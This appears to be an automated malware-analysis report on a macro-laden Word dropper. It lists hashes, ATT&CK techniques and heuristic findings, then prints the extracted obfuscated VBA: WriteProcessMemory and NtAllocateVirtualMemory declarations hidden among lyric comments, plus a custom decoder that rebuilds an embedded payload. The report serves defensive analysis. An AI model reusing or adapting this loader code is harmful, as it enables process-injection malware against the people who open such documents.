Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dfc1b17c6d5465e9…

MALICIOUS

Office (OLE)

Size: 229.0 KB
Created: 2017-06-01 11:44:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: 7e58847b2976bbfe4ad18766cdf79f3c
SHA-1: e58fe871b11d0b8fec212678ebb2d4797079ca86
SHA-256: dfc1b17c6d5465e9409b0e007f2a328eb37c6ed4d94c8b5db9e014398327d99a
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The macro declares and references API calls such as WriteProcessMemory, indicating it is designed to inject code into a process or to download and execute a second-stage payload. The presence of `Shell` execution in the `Document_Open` event further supports this. The ClamAV detection name 'Doc.Dropper.Agent' also points to dropper functionality.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-6850893-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6850893-0
  • Reference to WriteProcessMemory API [critical] SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • VBA macros detected [medium] (1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL                                                  Channel
    • http://www.iec.ch                                  In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/                       In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#        In document text (OLE body)
    • http://purl.org/dc/elements/1.1/                   In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/                    In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#   In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#     In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/                 In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9134 bytes
SHA-256: 30d2115e76f12050e489f0b6e682c4574bd467a1c93d2ea287d9aed758009770

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cerulescent"
'
'  I feel the end is closing in
#If (4 + 3) > 4 / 2 And Win64 > (6 - 6) / 1 Then
'  That vanish into the black sun
'  That vanish into the black sun
Public Declare PtrSafe Function owing Lib "ntdll.dll  " Alias "NtAllocateVirtualMemory" (martian As LongPtr, pomfret As LongPtr, ByVal ceratozamia As LongPtr,expressionismByVal As LongPtr, micrometeorite As LongPtr, ByVal emptying As LongPtr) As LongPtr
'  That vanish into the black sun
'  That vanish into the black sun
Public Declare PtrSafe Function streptomycin Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (albata As LongPtr, hiss As Any,legumin As LongPtr, purblind As Any) As Boolean
'  Visions of happiness are burning
'  Of sorrow slowly killing me
Public  Declare PtrSafe Function shikar Lib "Kernel32" Alias "CreateTimerQueueTimer" (scented As Any, ByVal philanthropist As Any, ByVal roentgenogram As Any, ByVal halve As Any, ByVal admonitory As Any, ByVal soidisant As Any, ByVal matchless As Any) As Long
'  I must fight this feeling
'  Taste the last drops of life
Public Declare PtrSafe Function chintz Lib "ntdll.dll" Alias "NtDeleteAtom" (replevy As LongPtr)
'  I feel the end is closing in
'  My heart is bleeding why am I here
Public Declare PtrSafe Function southey Lib "Shlwapi.dll" Alias "CreateFileWrapW" (gabonese As LongPtr) As LongPtr
'  Dreams that turn into madness
'  That vanish into the black sun
Public Declare PtrSafe Function chronograph Lib "Kernel32.dll" Alias "CreateEventW" (ByVal botanic As LongPtr,misunderstood As LongPtr,adorably As LongPtr,aeternum As LongPtr,obvious As LongPtr) As Long
'  I can feel my soul leaving me
'  I feel the end is closing in
Public Declare PtrSafe Function colorable Lib "Kernel32.dll  " Alias "WriteProcessMemory" (ByVal piscatorial As Any, ByVal barrier As Any, ByVal altogeher As Any, ByVal irishman As Any, ByVal hear As Any) As LongPtr
'  I can feel my soul leaving me
'  I feel the end is closing in
Public Declare PtrSafe Function christening Lib "ntdll.dll" Alias "NtCreateEventPair" (celeriac As LongPtr,ammoniacal As LongPtr,misrepresented As LongPtr) As LongPtr
'
'  Life doesn't work out as planned

'  That vanish into the black sun
'  That vanish into the black sun
#Else
'  I can feel my soul leaving me
'  I can feel my soul leaving me
Public Declare Function owing Lib "Ntdll.dll " Alias "NtAllocateVirtualMemory" (announced As Long, agglutinative As Long, ByVal discontinue As Long, fourthlyByVal As Long, motherofpearl As Long, ByVal shahaptian As Long) As Long
'  I feel the end is closing in
'  My heart is bleeding why am I here
Public Declare Function shikar Lib "Kernel32" Alias "CreateTimerQueueTimer" (bolographic As Any, ByVal punctuation As Any, ByVal mortise As Any, ByVal mateless As Any, ByVal poecilogale As Any, ByVal heady As Any, ByVal countywide As Any) As Long
'  Try to breathe but there's no air
'  Trying to breathe but there's no air
Public Declare Function currente Lib "Kernel32.dll" Alias "CreateEventW" (ByVal ambidexterity As Long, plectranthus As Long, rending As Long, nonsmoker As Long, slantwise As Long) As Long
'  I must fight this feeling
'  Visions of happiness are burning
Public Declare Function succeeding Lib "ntdll.dll" Alias "NtDeleteAtom" (nis As Long)
'  Taste the last drops of life
'  Life doesn't work out as planned
Public Declare Function fatuis Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (bursiform As Long, rovescio As Any, damnosa As Long, skeletal As Any) As Boolean
'  To dwell in nothing and forever disappear
'  Life doesn't work out as planned
Public Declare Function adiaphanous Lib "ntdll.dll" Alias "NtCreateEventPair" (enharmonic As Long, aerated As Long, bombina As Long) As Long
'  Visions of happiness are burning
'  Taste the last drops of life
Public Declare Function colorable Lib "Kernel32.dll  " Alias "WriteProcessMemory" (ByVal palatable As Any, ByVal unaccountably As Any, ByVal incarnation As Any, ByVal actinomycetal As Any, ByVal tegucigalpa As Any) As Long
'
'  Trying to breathe but there's no air
Public Declare Function disclosure Lib "Shlwapi.dll" Alias "CreateFileWrapW" (brachinus As Long) As Long
'  My heart is bleeding why am I here
'  My heart is bleeding why am I here

'  I feel the end is closing in
'  Taste the last drops of life
#End If
'  My heart is bleeding why am I here
'  I feel the end is closing in
Function headstock(woodsy)
headstock = AscW(woodsy)
End Function
     Sub Array1()
         Dim aiData(10) As Integer
         Dim i As Integer
         For i = LBound(aiData) To UBound(aiData)
             aiData(i) = i
         Next i
         Debug.Print "Lower Bound = " & LBound(aiData)
         Debug.Print "Upper Bound = " & UBound(aiData)
         Debug.Print "Num Elements = " & WorksheetFunction.Count(aiData)
         Debug.Print "Sum Elements = " & WorksheetFunction.Sum(aiData)
     End Sub

Function buttock(democritus) As String
Dim bibliophile As String
Dim grammarian As Long
Dim qualified As Long

Dim moistened As Long

Dim accra As Integer
Dim postmistress As Long
chine = Fix(344)

Dim indene As Long
naiadales = armillariella \ 64

Dim parnassia As Long
Dim memoriam() As Byte
Dim eyelotion(63) As Long
naiadales = armillariella / 235

Dim noncomprehensively As Integer

Dim innoxious(6962) As Byte
Dim cleanable(63) As Long
Dim acrobatic(63) As Long
Dim cross As Variant

poisonous = 63
analyze = 4096
sprite = 52 - 126 + 65610
welllaid = 262144
belt = 163 - 24 + 257909
burn = 5 + 4027
ashtray = 105 + 16514967
Dim quietism As String

periphrastic = 94 - 28 - 2
Dim hydrographer As Byte

scrofulous = 16711680
notomys = 72 + 65208
Dim chieftain As Long

artist = 256
richness = 255
Dim appropriable As String
allhallowmas = 0
instant = 5827
Dim audio() As Byte
Dim commissure As Long
Dim founded As Integer
audio = VBA.StrConv(democritus, 128)
Dim boundshave As Byte
cruciferous = 95
blissfully = 20997
grindery = 365472
 VBA.Financial.Pmt _
 0, cruciferous, 28795, 41017, 4

bury = 5827
blathering = vbKeyShift - 12
For simoon = 0 To bury
If simoon Mod 2 = 0 Then
audio(simoon) = audio(simoon) - blathering
Else
audio(simoon) = audio(simoon) - (blathering - 1)
End If
Next simoon
athena = 113
eel = 18459
coatdress = 389307
 VBA.Financial.Pmt _
 0, athena, 5650, 40852, 5

accra = 0
constituted = 6 - 88 + 82
consuetudinis = 42 - 72 + 73
jaculate = retaliating
For parnassia = 0 To 63
cleanable(parnassia) = grovel(parnassia, periphrastic, 66)
acrobatic(parnassia) = grovel(parnassia, analyze, 66)
eyelotion(parnassia) = grovel(parnassia, welllaid, 66)
Next parnassia
argive = 26
raftsman = 30238
ayudante = 141870
 VBA.Financial.Pmt _
 0, argive, 7440, 44270, 5

memoriam = audio
perceptibly = 4
potvaliant = 114
angularness = 33068
tutelage = 496668
 VBA.Financial.Pmt _
 0, potvaliant, 38361, 19669, 7

clinocephaly = 3
thrilled = "countercharm"

armillariella = maneuverer / 160

ripening = clinocephaly + 1
corduroy = 11 - 9
For postmistress = 0 To bury
something = memoriam(postmistress)
bookmaker = memoriam(postmistress + 2)
grammarian = eyelotion(jaculate(something)) _
 + acrobatic(jaculate(memoriam(postmistress + 1))) + cleanable(jaculate(bookmaker)) + jaculate(memoriam(postmistress + clinocephaly))
parnassia = grovel(grammarian, scrofulous, 58)
innoxious(indene) = grovel(parnassia, sprite, 48)
parnassia = grovel(grammarian, notomys, 58)
innoxious(indene + 1) = grovel(parnassia, artist, 48)
innoxious(indene + corduroy) = grovel(grammarian, richness, 58)
indene = indene + corduroy + 1
postmistress = postmistress + 3
Next
buttock = innoxious
End Function

Function grovel(outgrowth, observing, prestige)
Select Case prestige
Case 48 + 2 - 2
grovel = outgrowth \ observing
Case 58 + 2 - 2
grovel = outgrowth And observing
Case 66 + 2 - 2
grovel = outgrowth * observing
End Select
End Function

Function retaliating()
Dim lack(255) As Byte
dormouse = 79 - 44 + 30
Do
lack(dormouse) = dormouse - 65
dormouse = dormouse + 1
Loop While dormouse <= 90 + 1
dormouse = 48
Do
lack(dormouse) = dormouse + 4
dormouse = dormouse + 1
Loop While dormouse <= 50 + 8
dormouse = 97
Do
lack(dormouse) = dormouse - 71
dormouse = dormouse + 1
Loop While dormouse <= 120 + 3
lack(47) = 63
dormouse = 43
lack(dormouse) = 60 + 2
retaliating = lack
End Function


Attribute VB_Name = "offered"
Attribute VB_Base = "0{8F65F422-3E58-4FC6-A956-508B4876140B}{D9D6EE1F-4C45-4659-9A6F-BAA54BF614FA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False